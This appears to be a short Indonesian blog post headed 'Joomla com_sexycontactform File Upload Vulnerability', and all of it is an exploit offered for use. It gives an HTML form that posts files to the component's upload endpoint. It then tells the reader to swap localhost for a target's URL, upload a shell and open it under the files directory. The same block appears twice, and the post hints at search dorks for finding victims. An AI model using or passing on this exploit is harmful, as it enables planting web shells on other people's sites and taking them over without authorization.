Exploit :
<form method="POST" action="http://localhost/components/com_sexycontactform//fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Dork : Use your Brain
1.Misal udah dapet target, langsung masukin ke exploit itu ( http://localhost ) ganti dengan URL web target mu lalu simpan
2.Setelah itu buka exploit tadi, ada form upload, browse shell mu, lalu klik upload
3.File access /components/com_sexycontactform//fileupload/files/namafilekamu
<form method="POST" action="http://localhost/components/com_sexycontactform//fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Dork : Use your Brain
1.Misal udah dapet target, langsung masukin ke exploit itu ( http://localhost ) ganti dengan URL web target mu lalu simpan
2.Setelah itu buka exploit tadi, ada form upload, browse shell mu, lalu klik upload
3.File access /components/com_sexycontactform//fileupload/files/namafilekamu
0 Komentar untuk "Joomla com_sexycontactform File Upload Vulnerability"